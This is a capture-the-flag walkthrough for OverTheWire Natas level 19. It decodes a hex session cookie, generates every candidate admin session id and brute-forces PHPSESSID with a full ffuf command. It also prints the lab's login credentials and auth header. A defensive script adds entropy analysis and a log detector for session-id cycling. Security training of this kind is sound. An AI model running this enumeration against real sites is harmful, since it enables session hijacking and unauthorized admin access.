
# Level 18 - Level 19

```
Username: natas19
Password: 8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s
URL:      http://natas19.natas.labs.overthewire.org
```

## Overview

This time we get the same login page as in the last level, and the page clearly states that the source code is almost the same, except that the session ids will now be random.

<figure><img src="/files/MH09TeHLGBmPE5wcv2lP" alt=""><figcaption></figcaption></figure>

Let's first get the session id by trying to login with some random credentials.

<figure><img src="/files/9RSeDu5GnB5CUwR5tjQi" alt=""><figcaption></figcaption></figure>

***

## Decoding the Cookie

The session id we got looked like a random encoded string. I tried decoding it with a few basic encoding schemes in CyberChef and was able to decode it using the `From Hex` recipe.

<figure><img src="/files/vbvrkhMWaxOkWt7GvBgf" alt=""><figcaption></figcaption></figure>

The string that we got after decoding is `<id>-admin`.

***

## Brute-forcing Session ID

Since we know the full range of possible ids (0 to 640, as in the previous level), we can generate a wordlist of every possible `<id>-admin` session id in hex encoding. The wordlist can be generated with the following Python script.

```python
#!/usr/bin/env python3
# Generate every candidate PHPSESSID for this level: the cookie is hex("<id>-admin")
# and the id is a small integer (0-640), so the whole keyspace fits in one wordlist.

with open("hex_640.txt", "w") as wordlist:
    cookies = [f"{i}-admin".encode("utf-8").hex() + "\n" for i in range(0, 641)]
    wordlist.writelines(cookies)
```

Now we have successfully generated the word list by executing the above python script.

<figure><img src="/files/qv7eQtrFFJsPgFtBrN2A" alt=""><figcaption></figcaption></figure>

Now it's time to use ffuf to brute-force the session id.

{% code lineNumbers="true" %}

```bash
ffuf -w hex_640.txt:FUZZ \
    -u $'http://natas19.natas.labs.overthewire.org/index.php' \
    -X $'POST' \
    -H $'Host: natas19.natas.labs.overthewire.org' \
    -H $'Content-Length: 31' -H $'Cache-Control: max-age=0' \
    -H $'Authorization: Basic bmF0YXMxOTo4TE1KRWhLRmJNS0lMMm14UUtqdjBhRURkazd6cFQwcw==' \
    -H $'Upgrade-Insecure-Requests: 1' \
    -H $'Origin: http://natas19.natas.labs.overthewire.org' \
    -H $'Content-Type: application/x-www-form-urlencoded' \
    -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36' \
    -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
    -H $'Referer: http://natas19.natas.labs.overthewire.org/' \
    -H $'Accept-Encoding: gzip, deflate, br' \
    -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
    -H $'Connection: close' \
    -b $'PHPSESSID=FUZZ' \
    -d $'username=admin&password=somoene' \
    -fr "You are logged in as a regular user."
```

{% endcode %}

From the results of `ffuf`, we can get the valid admin cookie.

<figure><img src="/files/Tv0im1RMEPL6dfXgpjOs" alt=""><figcaption></figcaption></figure>
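The following script is an added example, not part of the original writeup, that looks at the same cookie scheme from the defender's side. It encodes and decodes the `hex("<id>-admin")` format shown above, computes how little entropy the guessable part carries (641 values, about 9.3 bits, which is why one ffuf run enumerates it), contrasts that with a CSPRNG-generated session id, and runs a small detector over constructed access-log lines that flags a client cycling through many different `PHPSESSID` values. The log format (a common-log line with the cookie appended), the sample lines and the function names are all my own assumptions for the example.

```python
import math
import re
import secrets
from collections import defaultdict

# The cookie format observed in the writeup: hex("<id>-admin"), id in 0..640.
MAX_ID = 640
ROLE = "admin"


def encode_session(session_id: int, role: str = ROLE) -> str:
    """Build a PHPSESSID value the way the level's session scheme does."""
    return f"{session_id}-{role}".encode("utf-8").hex()


def decode_session(cookie: str) -> tuple[int, str]:
    """Invert the hex encoding and split into (id, role). Raises ValueError on junk."""
    raw = bytes.fromhex(cookie).decode("utf-8")
    id_part, sep, role = raw.partition("-")
    if not sep or not id_part.isdigit():
        raise ValueError(f"unexpected cookie format: {raw!r}")
    return int(id_part), role


def keyspace_bits(max_id: int = MAX_ID) -> float:
    """Entropy of the guessable part: log2 of the number of possible ids."""
    return math.log2(max_id + 1)


def secure_session_id(nbytes: int = 16) -> str:
    """What the cookie should look like instead: 128 bits from a CSPRNG, hex-encoded."""
    return secrets.token_hex(nbytes)


# Constructed access-log lines (not real traffic) in a common-log-like format with the
# PHPSESSID cookie appended, as a web server could be configured to log (assumed format).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "POST /index.php HTTP/1.1" 200 512 "PHPSESSID=302d61646d696e"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "POST /index.php HTTP/1.1" 200 512 "PHPSESSID=312d61646d696e"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "POST /index.php HTTP/1.1" 200 512 "PHPSESSID=322d61646d696e"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "POST /index.php HTTP/1.1" 200 512 "PHPSESSID=332d61646d696e"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "POST /index.php HTTP/1.1" 200 640 "PHPSESSID=342d61646d696e"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "POST /index.php HTTP/1.1" 200 512 "PHPSESSID=a1b2c3d4e5f60718293a4b5c6d7e8f90"
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 512 "PHPSESSID=a1b2c3d4e5f60718293a4b5c6d7e8f90"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"PHPSESSID=(?P<sid>[0-9a-fA-F]+)"\s*$')


def session_guessing_clients(log_text: str, threshold: int = 3) -> dict[str, int]:
    """Return {client_ip: distinct_session_ids} for clients that present more than
    `threshold` different PHPSESSID values. A legitimate browser reuses one cookie;
    cycling through many is the signature of the enumeration shown in this level."""
    seen: dict[str, set[str]] = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            seen[m["ip"]].add(m["sid"])
    return {ip: len(sids) for ip, sids in seen.items() if len(sids) > threshold}


if __name__ == "__main__":
    cookie = encode_session(0)
    print(cookie, decode_session(cookie))            # 302d61646d696e (0, 'admin')
    print(f"guessable bits: {keyspace_bits():.1f}")  # 9.3
    print("secure example:", secure_session_id())
    print("suspicious clients:", session_guessing_clients(SAMPLE_LOG))
```

The fix on the application side is the one `secure_session_id` illustrates: the session identifier must be drawn from a CSPRNG with enough entropy that enumeration is infeasible, and the role must live server-side in the session store rather than inside the cookie value. The detector is deliberately simple (distinct cookie values per client IP); in practice you would also window it by time and rate-limit or block clients that trip it.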

***

## Getting the Password

Now let's replace the session id in the browser with the one we found using ffuf and refresh the page to get the credentials for the next level.

<figure><img src="/files/gnBnHuRTa3zwqoFXrIMF" alt=""><figcaption></figcaption></figure>
